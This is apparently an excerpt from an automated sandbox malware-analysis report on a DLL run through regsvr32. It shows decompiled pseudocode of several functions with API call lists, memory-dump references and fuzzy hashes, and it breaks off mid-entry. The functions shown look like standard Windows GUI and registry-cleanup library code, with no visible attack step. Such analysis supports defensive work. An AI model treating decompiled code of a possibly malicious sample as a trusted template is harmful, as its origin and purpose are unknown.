                                                                                                                			E1003C70C(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t78;
				void* _t79;
				void* _t80;

				_t80 = __eflags;
				E1004764D(0x100917b7, __ebx, __edi, __esi);
				_t78 = __ecx;
				L1000CDFE(__ebx, _t79 - 0x40, __edi, __ecx, _t80);
				 *(_t79 - 4) =  *(_t79 - 4) & 0x00000000;
				GetClientRect( *(_t78 + 0x20), _t79 - 0x2c);
				GetWindowRect( *(_t78 + 0x20), _t79 - 0x1c);
				E1000C8F5(_t78, _t79 - 0x1c);
				OffsetRect(_t79 - 0x2c,  ~( *(_t79 - 0x1c)),  ~( *(_t79 - 0x18)));
				E1000BF2B(_t79 - 0x40, _t79 - 0x2c);
				OffsetRect(_t79 - 0x1c,  ~( *(_t79 - 0x1c)),  ~( *(_t79 - 0x18)));
				 *((intOrPtr*)( *_t78 + 0x148))(_t79 - 0x40, _t79 - 0x1c, __ecx, 0x34);
				E1000BFAF(_t79 - 0x40, _t79 - 0x1c);
				SendMessageA( *(_t78 + 0x20), 0x14,  *(_t79 - 0x3c), 0);
				 *((intOrPtr*)( *_t78 + 0x14c))(_t79 - 0x40, _t79 - 0x1c);
				 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
				return E10047725(L1000CE52(__ebx, _t79 - 0x40, OffsetRect, _t78,  *(_t79 - 4)));
			}






                                                                                                                0x1003c70c
                                                                                                                0x1004302a
                                                                                                                0x1004302f
                                                                                                                0x10043035
                                                                                                                0x1004303a
                                                                                                                0x10043045
                                                                                                                0x10043052
                                                                                                                0x1004305e
                                                                                                                0x10043079
                                                                                                                0x10043082
                                                                                                                0x10043097
                                                                                                                0x100430a5
                                                                                                                0x100430b2
                                                                                                                0x100430c1
                                                                                                                0x100430d3
                                                                                                                0x100430d9
                                                                                                                0x100430ea

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1004302A
                                                                                                                  • Part of subcall function 1000CDFE: __EH_prolog3.LIBCMT ref: 1000CE05
                                                                                                                  • Part of subcall function 1000CDFE: GetWindowDC.USER32(00000000), ref: 1000CE31
                                                                                                                • GetClientRect.USER32 ref: 10043045
                                                                                                                • GetWindowRect.USER32 ref: 10043052
                                                                                                                  • Part of subcall function 1000C8F5: ScreenToClient.USER32(?,10012D93), ref: 1000C909
                                                                                                                  • Part of subcall function 1000C8F5: ScreenToClient.USER32(?,10012D9B), ref: 1000C912
                                                                                                                • OffsetRect.USER32 ref: 10043079
                                                                                                                  • Part of subcall function 1000BF2B: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 1000BF50
                                                                                                                  • Part of subcall function 1000BF2B: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 1000BF65
                                                                                                                • OffsetRect.USER32 ref: 10043097
                                                                                                                  • Part of subcall function 1000BFAF: IntersectClipRect.GDI32(?,?,?,?,?), ref: 1000BFD4
                                                                                                                  • Part of subcall function 1000BFAF: IntersectClipRect.GDI32(?,?,?,?,?), ref: 1000BFE9
                                                                                                                • SendMessageA.USER32 ref: 100430C1
                                                                                                                  • Part of subcall function 1000CE52: __EH_prolog3.LIBCMT ref: 1000CE59
                                                                                                                  • Part of subcall function 1000CE52: ReleaseDC.USER32(?,00000000), ref: 1000CE76
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Clip$ClientH_prolog3$ExcludeIntersectOffsetScreenWindow$MessageReleaseSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2952362992-0
                                                                                                                • Opcode ID: 6affbc70d6df2e7f4f5166bf977069b06b295726e7198a2e6cc91a1e4fb8232b
                                                                                                                • Instruction ID: c88571772fa0b80cc6a0098a865d4c4e15fcb43bc89952879f8554f4dc41fe22
                                                                                                                • Opcode Fuzzy Hash: 6affbc70d6df2e7f4f5166bf977069b06b295726e7198a2e6cc91a1e4fb8232b
                                                                                                                • Instruction Fuzzy Hash: 1C21D67691051AEFDB19DBA4CC95DFEB3B8FF08300F004269E656A31A0DB246A06CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10027605 Relevance: 9.1, APIs: 6, Instructions: 71registrystringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 74%
                                                                                                                			E10027605(void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t8;
				char* _t14;
				void* _t24;
				int _t25;
				void* _t34;
				char* _t35;
				void* _t36;
				signed int _t38;

				_t34 = __edx;
				_t8 =  *0x100b9e70; // 0xbb35530
				_v8 = _t8 ^ _t38;
				_t35 = E1004C810(_a4);
				if(_t35 != 0) {
					_t14 =  &(_t35[lstrlenA(_t35)]);
					if(_t14 != 0) {
						_push(_t36);
						_push(_t24);
						while(1) {
							 *_t14 = 0;
							E1004D4A9(_t35, _t14);
							if(RegOpenKeyA(0x80000000, _t35,  &_v276) != 0) {
								break;
							}
							_t25 = 0;
							if(RegEnumKeyA(_v276, 0,  &_v272, 0x105) == 0) {
								_t25 = 1;
							}
							RegCloseKey(_v276);
							if(_t25 == 0) {
								RegDeleteKeyA(0x80000000, _t35);
								_t14 = E1004D3FF(_t35, 0x5c);
								_t46 = _t14;
								if(_t14 != 0) {
									continue;
								}
							}
							break;
						}
						_pop(_t24);
						_pop(_t36);
					}
					_push(_t35);
					E100470E9(_t24, _t35, _t36, _t46);
				}
				return E1004763E(1, _t24, _v8 ^ _t38, _t34, _t35, _t36);
			}


















                                                                                                                0x10027605
                                                                                                                0x1002760e
                                                                                                                0x10027615
                                                                                                                0x10027622
                                                                                                                0x10027627
                                                                                                                0x10027634
                                                                                                                0x10027636
                                                                                                                0x10027638
                                                                                                                0x1002763e
                                                                                                                0x1002763f
                                                                                                                0x10027641
                                                                                                                0x10027644
                                                                                                                0x1002765c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002766a
                                                                                                                0x1002767b
                                                                                                                0x1002767d
                                                                                                                0x1002767d
                                                                                                                0x10027684
                                                                                                                0x1002768c
                                                                                                                0x10027690
                                                                                                                0x10027699
                                                                                                                0x1002769e
                                                                                                                0x100276a2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100276a2
                                                                                                                0x00000000
                                                                                                                0x1002768c
                                                                                                                0x100276a4
                                                                                                                0x100276a5
                                                                                                                0x100276a5
                                                                                                                0x100276a6
                                                                                                                0x100276a7
                                                                                                                0x100276af
                                                                                                                0x100276bc

                                                                                                                APIs
                                                                                                                • __strdup.LIBCMT ref: 1002761D
                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 1002762E
                                                                                                                  • Part of subcall function 1004D4A9: __mbsdec_l.LIBCMT ref: 1004D4B3
                                                                                                                • RegOpenKeyA.ADVAPI32(80000000,00000000,?), ref: 10027654
                                                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 10027673
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 10027684
                                                                                                                • RegDeleteKeyA.ADVAPI32(80000000,00000000), ref: 10027690
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseDeleteEnumOpen__mbsdec_l__strduplstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2107731021-0
                                                                                                                • Opcode ID: 70d7aa6270cf098f979baa59afcea3b92871a96ea337fb48cd94e3f95162b8f2
                                                                                                                • Instruction ID: 60820bd84a7cae173fc4976681b347de2981e602b7a1f39c4aa5d16319027221
                                                                                                                • Opcode Fuzzy Hash: 70d7aa6270cf098f979baa59afcea3b92871a96ea337fb48cd94e3f95162b8f2
                                                                                                                • Instruction Fuzzy Hash: F011C4356005196EE315DBA8DC89FEB7BECEF46649F2100AAF909D2040DF74AD418A69
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100201CD Relevance: 9.1, APIs: 6, Instructions: 71COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E100201CD(intOrPtr __ecx, void* __edx, void* _a4, intOrPtr _a8) {
				signed int _v8;
				void _v68;
				int _v72;
				struct tagPOINT _v76;
				struct HWND__* _v80;
				struct tagPOINT _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t25;
				int _t29;
				struct HDC__* _t42;
				signed int _t44;
				void* _t50;
				void* _t55;
				void* _t56;
				signed int _t57;

				_t50 = __edx;
				_t23 =  *0x100b9e70; // 0xbb35530
				_v8 = _t23 ^ _t57;
				_t25 = _a8;
				_t55 = _a4;
				_v92 = __ecx;
				_v88 = _t25;
				if(_t25 == 0) {
					_t42 = GetDC(0);
				} else {
					_t42 =  *(_t25 + 8);
				}
				_t44 = 0xf;
				memcpy( &_v68, _t55, _t44 << 2);
				_t29 = MulDiv(GetDeviceCaps(_t42, 0x5a), _v68, 0x2d0);
				_t56 = DPtoLP;
				_v72 = _t29;
				_v76 = 0;
				DPtoLP(_t42,  &_v76, 1);
				_v84 = 0;
				_v80 = 0;
				DPtoLP(_t42,  &_v84, 1);
				_v68 =  ~(E10049165(_v72 - _v80));
				if(_v88 == 0) {
					ReleaseDC(0, _t42);
				}
				return E1004763E(E1001E424(_v92,  &_v68), _t42, _v8 ^ _t57, _t50, 0, _t56);
			}























                                                                                                                0x100201cd
                                                                                                                0x100201d3
                                                                                                                0x100201da
                                                                                                                0x100201dd
                                                                                                                0x100201e4
                                                                                                                0x100201e8
                                                                                                                0x100201eb
                                                                                                                0x100201ee
                                                                                                                0x100201fd
                                                                                                                0x100201f0
                                                                                                                0x100201f0
                                                                                                                0x100201f0
                                                                                                                0x10020201
                                                                                                                0x1002020a
                                                                                                                0x10020219
                                                                                                                0x1002021f
                                                                                                                0x10020225
                                                                                                                0x10020231
                                                                                                                0x10020234
                                                                                                                0x1002023d
                                                                                                                0x10020240
                                                                                                                0x10020243
                                                                                                                0x10020257
                                                                                                                0x1002025a
                                                                                                                0x1002025e
                                                                                                                0x1002025e
                                                                                                                0x1002027e

                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 100201F7
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10020212
                                                                                                                • MulDiv.KERNEL32 ref: 10020219
                                                                                                                • DPtoLP.GDI32(00000000,?,00000001), ref: 10020234
                                                                                                                • DPtoLP.GDI32(00000000,?,00000001), ref: 10020243
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 1002025E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDeviceRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 127614599-0
                                                                                                                • Opcode ID: 72e190af9e980fad07a9f26443095ab5f66548e785b1492687255668b6794a59
                                                                                                                • Instruction ID: 9876b56e36250cf60ecf2c55abee1cb27d42b24326faa1459ea02bd52087e0db
                                                                                                                • Opcode Fuzzy Hash: 72e190af9e980fad07a9f26443095ab5f66548e785b1492687255668b6794a59
                                                                                                                • Instruction Fuzzy Hash: C1210775E00218AFDB00DFE5DC899AEBBB9FB49300F50001AF505EB291CB74A905CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001B312 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1001B312(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t7;
				void* _t13;
				struct HWND__** _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				_t17 = _t18;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t16 = _t17;
						_t7 = _t17;
						if(_t17 == 0) {
							L10:
							if(_t18 == 0 && _t17 != 0) {
								_t17 = GetLastActivePopup(_t17);
							}
							_t15 = _a8;
							if(_t15 != 0) {
								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
									 *_t15 =  *_t15 & 0x00000000;
								} else {
									 *_t15 = _t16;
									EnableWindow(_t16, 0);
								}
							}
							return _t17;
						} else {
							goto L9;
						}
						do {
							L9:
							_t16 = _t7;
							_t7 = GetParent(_t7);
						} while (_t7 != 0);
						goto L10;
					}
					_t17 = GetParent(_t17);
					L7:
					if(_t17 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t13 = E1001B2D2();
				if(_t13 != 0) {
					L4:
					_t17 =  *(_t13 + 0x20);
					goto L7;
				}
				_t13 = E10012730();
				if(_t13 != 0) {
					goto L4;
				}
				_t17 = 0;
				goto L8;
			}









                                                                                                                0x1001b31a
                                                                                                                0x1001b322
                                                                                                                0x1001b324
                                                                                                                0x1001b341
                                                                                                                0x1001b34f
                                                                                                                0x1001b35a
                                                                                                                0x1001b35c
                                                                                                                0x1001b35e
                                                                                                                0x1001b360
                                                                                                                0x1001b36b
                                                                                                                0x1001b36d
                                                                                                                0x1001b37a
                                                                                                                0x1001b37a
                                                                                                                0x1001b37c
                                                                                                                0x1001b382
                                                                                                                0x1001b386
                                                                                                                0x1001b3a4
                                                                                                                0x1001b397
                                                                                                                0x1001b39a
                                                                                                                0x1001b39c
                                                                                                                0x1001b39c
                                                                                                                0x1001b386
                                                                                                                0x1001b3ad
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001b362
                                                                                                                0x1001b362
                                                                                                                0x1001b363
                                                                                                                0x1001b365
                                                                                                                0x1001b367
                                                                                                                0x00000000
                                                                                                                0x1001b362
                                                                                                                0x1001b354
                                                                                                                0x1001b356
                                                                                                                0x1001b358
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001b358
                                                                                                                0x1001b326
                                                                                                                0x1001b32d
                                                                                                                0x1001b33c
                                                                                                                0x1001b33c
                                                                                                                0x00000000
                                                                                                                0x1001b33c
                                                                                                                0x1001b32f
                                                                                                                0x1001b336
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001b338
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 1001B344
                                                                                                                • GetParent.USER32(?), ref: 1001B352
                                                                                                                • GetParent.USER32(?), ref: 1001B365
                                                                                                                • GetLastActivePopup.USER32(?), ref: 1001B374
                                                                                                                • IsWindowEnabled.USER32(?), ref: 1001B389
                                                                                                                • EnableWindow.USER32(?,00000000), ref: 1001B39C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                • String ID:
                                                                                                                • API String ID: 670545878-0
                                                                                                                • Opcode ID: d23f73bc6d61cb9be05bd0fc1f8dced6eafdd4e1110b308578c59236263ff7c2
                                                                                                                • Instruction ID: 5eb2a14de721a093d1a5a6b33b515e1c7fa1d211e2aaf4fcf38d1d55c5650deb
                                                                                                                • Opcode Fuzzy Hash: d23f73bc6d61cb9be05bd0fc1f8dced6eafdd4e1110b308578c59236263ff7c2
                                                                                                                • Instruction Fuzzy Hash: B511A072601F3297E262DA6A8D8071B77D8EF46AD1F160154EC61DF250DB70DEA052D0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10034CE4 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E10034CE4(intOrPtr _a4) {
				intOrPtr _v4;
				void* __ecx;
				void* __edi;
				void* __esi;
				struct HWND__* _t17;
				struct HWND__* _t19;
				signed int _t23;
				intOrPtr _t31;
				void* _t32;
				struct HWND__* _t34;

				_v4 = _t31;
				_t17 = GetWindow(GetDesktopWindow(), 5);
				_t34 = _t17;
				_t36 = _t34;
				if(_t34 == 0) {
					return _t17;
				} else {
					_push(_t32);
					while(1) {
						_t32 = E10014011(_t31, _t32, _t34, _t36, _t34);
						if(_t32 != 0) {
							_t21 =  *((intOrPtr*)(_v4 + 0x20));
							if( *((intOrPtr*)(_v4 + 0x20)) != _t34 && E10034C53(_t21, _t34) != 0) {
								_t23 = GetWindowLongA(_t34, 0xfffffff0);
								if(_a4 != 0) {
									__eflags = _t23 & 0x18000000;
									if(__eflags == 0) {
										__eflags =  *(_t32 + 0x3c) & 0x00000002;
										if(__eflags != 0) {
											__eflags =  *(_v4 + 0xb4);
											if(__eflags == 0) {
												ShowWindow(_t34, 4);
												_t14 = _t32 + 0x3c;
												 *_t14 =  *(_t32 + 0x3c) & 0xfffffffd;
												__eflags =  *_t14;
											}
										}
									}
								} else {
									if((_t23 & 0x18000000) == 0x10000000) {
										ShowWindow(_t34, 0);
										 *(_t32 + 0x3c) =  *(_t32 + 0x3c) | 0x00000002;
									}
								}
							}
						}
						_t19 = GetWindow(_t34, 2);
						_t34 = _t19;
						if(_t34 == 0) {
							return _t19;
						}
					}
				}
			}













                                                                                                                0x10034ce9
                                                                                                                0x10034cfa
                                                                                                                0x10034cfc
                                                                                                                0x10034cfe
                                                                                                                0x10034d00
                                                                                                                0x10034d8a
                                                                                                                0x10034d06
                                                                                                                0x10034d0d
                                                                                                                0x10034d0e
                                                                                                                0x10034d14
                                                                                                                0x10034d18
                                                                                                                0x10034d1e
                                                                                                                0x10034d23
                                                                                                                0x10034d33
                                                                                                                0x10034d3e
                                                                                                                0x10034d57
                                                                                                                0x10034d5c
                                                                                                                0x10034d5e
                                                                                                                0x10034d62
                                                                                                                0x10034d68
                                                                                                                0x10034d6f
                                                                                                                0x10034d74
                                                                                                                0x10034d76
                                                                                                                0x10034d76
                                                                                                                0x10034d76
                                                                                                                0x10034d76
                                                                                                                0x10034d6f
                                                                                                                0x10034d62
                                                                                                                0x10034d40
                                                                                                                0x10034d4a
                                                                                                                0x10034d4f
                                                                                                                0x10034d51
                                                                                                                0x10034d51
                                                                                                                0x10034d4a
                                                                                                                0x10034d3e
                                                                                                                0x10034d23
                                                                                                                0x10034d7d
                                                                                                                0x10034d7f
                                                                                                                0x10034d83
                                                                                                                0x00000000
                                                                                                                0x10034d86
                                                                                                                0x10034d83
                                                                                                                0x10034d0e

                                                                                                                APIs
                                                                                                                • GetDesktopWindow.USER32 ref: 10034CED
                                                                                                                • GetWindow.USER32(00000000), ref: 10034CFA
                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 10034D33
                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 10034D4F
                                                                                                                • ShowWindow.USER32(00000000,00000004), ref: 10034D74
                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 10034D7D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Show$DesktopLong
                                                                                                                • String ID:
                                                                                                                • API String ID: 3178490500-0
                                                                                                                • Opcode ID: 7ca15e30d6e3b84138a5ef8b0e7b537632191e1cd8eec9fc3b3d52b4e3121576
                                                                                                                • Instruction ID: 1e3a3d6b286c5198a37a0a2cf80933c151567ab3cee8bfaa98f8781c70b1d42d
                                                                                                                • Opcode Fuzzy Hash: 7ca15e30d6e3b84138a5ef8b0e7b537632191e1cd8eec9fc3b3d52b4e3121576
                                                                                                                • Instruction Fuzzy Hash: 04110E35501F666FE322CF258D89B8B7AD8EF423A2F520244F9518E290CF35E8408AA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10037D2E Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 62%
                                                                                                                			E10037D2E(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t28;
				long _t32;
				void* _t34;
				void* _t39;
				void* _t59;
				void* _t60;

				_push(0x18);
				E10047680(0x10090c67, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t60 - 0x1c)) = __ecx;
				_push(_t60 - 0x18);
				_push(_t60 - 0x20);
				_push( *((intOrPtr*)(_t60 + 0xc)));
				_push(0x3e8);
				L100717DA();
				_t28 = GlobalLock( *(_t60 - 0x18));
				L1000140B(_t60 - 0x14, E100184C0());
				 *(_t60 - 4) =  *(_t60 - 4) & 0x00000000;
				 *(_t60 - 4) = 1;
				L100011E5(_t60 - 0x14, _t28);
				_t32 = GlobalUnlock( *(_t60 - 0x18));
				 *(_t60 - 4) =  *(_t60 - 4) & 0x00000000;
				_push( *(_t60 - 0x18));
				_push(0x8000);
				_push(0x3e4);
				_push(0x3e8);
				_push( *((intOrPtr*)(_t60 + 0xc)));
				L100717D4();
				_t55 =  *((intOrPtr*)(_t60 - 0x1c));
				PostMessageA( *(_t60 + 8), 0x3e4,  *( *((intOrPtr*)(_t60 - 0x1c)) + 0x20), _t32);
				_t34 = E1001795E( *((intOrPtr*)(_t60 - 0x1c)));
				_t62 = _t34;
				if(_t34 != 0) {
					_t59 = E1001ACEF(_t60 - 0x14);
					_t39 = E1001E302(__ebx, _t55, _t59, _t62);
					_t53 =  *((intOrPtr*)( *((intOrPtr*)(_t39 + 4))));
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t39 + 4)))) + 0xa0))(_t59);
					E1000FED3(_t60 - 0x14, 0xffffffff);
				}
				L100013E3( *((intOrPtr*)(_t60 - 0x14)) + 0xfffffff0, _t53);
				return E10047725(0);
			}









                                                                                                                0x10037d2e
                                                                                                                0x10037d35
                                                                                                                0x10037d3a
                                                                                                                0x10037d40
                                                                                                                0x10037d44
                                                                                                                0x10037d45
                                                                                                                0x10037d48
                                                                                                                0x10037d4d
                                                                                                                0x10037d55
                                                                                                                0x10037d66
                                                                                                                0x10037d6b
                                                                                                                0x10037d73
                                                                                                                0x10037d77
                                                                                                                0x10037d7f
                                                                                                                0x10037d85
                                                                                                                0x10037d89
                                                                                                                0x10037d91
                                                                                                                0x10037d96
                                                                                                                0x10037d97
                                                                                                                0x10037d9c
                                                                                                                0x10037d9f
                                                                                                                0x10037da4
                                                                                                                0x10037daf
                                                                                                                0x10037db7
                                                                                                                0x10037dbc
                                                                                                                0x10037dbe
                                                                                                                0x10037dc8
                                                                                                                0x10037dca
                                                                                                                0x10037dd2
                                                                                                                0x10037dd7
                                                                                                                0x10037de2
                                                                                                                0x10037de2
                                                                                                                0x10037ded
                                                                                                                0x10037df9

                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 10037D35
                                                                                                                • UnpackDDElParam.USER32(000003E8,?,?,?), ref: 10037D4D
